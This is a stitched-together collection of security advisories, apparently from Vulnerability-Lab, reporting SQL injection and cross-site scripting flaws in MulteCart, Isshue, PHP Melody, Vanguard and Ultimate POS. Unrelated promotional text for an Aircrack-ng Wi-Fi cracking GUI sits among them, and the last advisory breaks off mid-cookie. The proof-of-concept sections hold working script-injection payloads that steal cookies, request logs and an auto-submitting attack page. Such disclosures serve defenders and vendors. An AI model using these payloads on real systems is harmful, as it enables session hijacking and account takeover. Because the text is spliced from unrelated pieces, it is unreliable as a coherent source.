#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...')
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
#14 {main}
Debug Array:
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
-
Reference(s):
https://multecartultimate.localhost:8080/vendor/vendor/view
https://multecartultimate.localhost:8080/customer/customer/view
https://multecartultimate.localhost:8080/inventory/inventory/update
https://multecartultimate.localhost:8080/order/sub-order/view-order
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following description ...
1. Disable to display the sql errors for other users then the admin or pipe it into a local log file outside the panel ui
2. Use a prepared statement to protect the query against further injection attacks
3. Restrict the vulnerable id parameter to disallow usage of special chars of post and get method requests
4. Encode and escape the id content on get method request with the id parameter
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
Dear, are you still having trouble with the numerous Aircrack-ng's orders? He is here.he is here. The Aircrack-ng graphical operation program is here! Make your operation more slight and make your kidneys more overdrawn.
Installation
cd Aircrack-ng gui #Enter directory
pip install -r requirements.txt #Installation dependencies (required dependencies in kali have been basically installed)
python3 aircrack-gui.py
User Guide
Startup interface 
Scan the network 
Capture handshake file 
Configure dictionary and handshake bag 
Cracking effect 
Summary
Simply put, it is to visualize the Aircrack-ng command, which is more convenient for novices to use. Of course, if you want to have a higher level of operation, then try the command line.
Attachment Download
Aircrack-ng
Decompression password
Follow the WeChat official account (kali Hacker Notes) and the backend reply to kali666 will be automatically obtained.
# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
# Version: 3.5
Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2284
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management
with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now.
Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best
eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce
solutions. Isshue is the best choice for any type of e-commerce business, big or small.
(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.
Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
A input validation web vulnerability has been discovered in the title input fields in `new invoice`, `customer` & `stock` modules.
The `title` input and parameter allows to inject own malicious script code with persistent attack vector. The content of the input
and parameter is insecure validated, thus allows remote attackers with privileged user accounts (manager/keeper/admin) to inject
own malformed script code that executes on preview. The request method to inject is post and the attack vector is persistent on
the application-side.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Edit Title
Vulnerable Input(s):
[+] Title
Vulnerable Parameter(s):
[+] title
Affected Module(s):
[+] stock
[+] customer
[+] invoice
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with keeper account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source:
<div class="row">
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
<div class="panel-heading ui-sortable-handle">
<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title"
data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i>
<span class="control-title">Edit title</span></a></li><li>
<a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li>
<a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li>
<a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand"
data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li>
<a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
<div class="panel-body">
<div class="row">
<div class="col-sm-8" id="payment_from_1">
<div class="form-group row">
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
<div class="col-sm-6">
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
</div>
--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
# Date: 2021-10-21
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
Document Title:
===============
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2291
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
2291
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to
compromise browser to web-application requests from the application-side.
The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class.
Privileged user accounts like edtiors are able to inject own malicious script code via editor to provoke a
public execution by users oder administrators. The request method to inject is get and after save in dbms
via post method the attack vector becomes persistent.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)
Vulnerable File(s):
[+] edit-episode.php
Vulnerable Parameter(s):
[+] episode_id
Affected Module(s):
[+] description
Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.
PoC: Payload
<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>
--- PoC Session Logss (GET) [WYSIWYG] ---
https://phpmelody.localhost.com:8080/admin/[PWND]
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin;
melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html;
vary: Accept-Encoding
Vulnerable Source: Video Editor (WYSIWYG - tinymce)
<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;"
aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
<span class="autosave-message"></span>
</div></div>
Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/edit-episode.php
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Solution - Fix & Patch:
=======================
Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1
Document Title:
===============
Vanguard v2.1 - (Search) POST Inject Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2283
Release Date:
=============
2021-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
2283
Common Vulnerability Scoring System:
====================================
4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.
Affected Product(s):
====================
VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application.
The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user
session data or to manipulate application contents for clients.
The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post
injection web vulnerability with non-persistent attack vector.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of affected application modules.
Request method(s):
[+] POST
Vulnerable Input(s):
[+] Search
Vulnerable Parameter(s):
[+] phps_query
Proof of Concept (PoC):
=======================
The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source: search
<div class="ui yellow basic segment"></div>
<div class="ui container" style="margin-top: -0.7em;">
<form method="POST" action="https://vanguard.squamifer.ovh/search">
<div class="ui action input fluid">
<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
<div class="ui divider"></div>
<div class="ui cards aligned centered">
<div class="alert color blue-color"><div class="ui hidden divider"></div>
<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
</div></div></div>
--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding
Exploitation: PoC
<html>
<head>
<title>PoC</title>
<style type="text/css">
#nodisplay {
display:none;
}
</style>
</head>
<body>
<div id="nodsiplay">
<form action="https://vanguard.localhost:8080/search" method="post">
<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
</form>
</div>
<script>
function submitForm() {
document.forms[0].submit();
}
submitForm();
</script>
</body>
</html>
Security Risk:
==============
The security risk of the validation web vulnerability in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
# Version: 4.4
Document Title:
===============
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2296
Release Date:
=============
2021-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
2296
Common Vulnerability Scoring System:
====================================
5.6
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The Ultimate POS is a erp, stock management, point of sale & invoicing web-application.
The application uses a mysql database management system in combination with php 7.2.
(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )
Abstract Advisory Information:
==============================
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application.
Affected Product(s):
====================
thewebfosters
Ultimate POS v4.4 - ERP (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent validation web vulnerability is located in the name parameter of the add products module.
Remote attackers with privileges as vendor to add products are able to inject own malicious script codes.
The request method to inject is post and the attack vector is persistent. Injects are possible via edit
or by a new create of a product.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks,
persistent external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Products (Add)
Vulnerable Input(s):
[+] Product Name
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] Products List
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
test"><img src="evil.source" onload=alert(document.cookie)></img>
---- PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
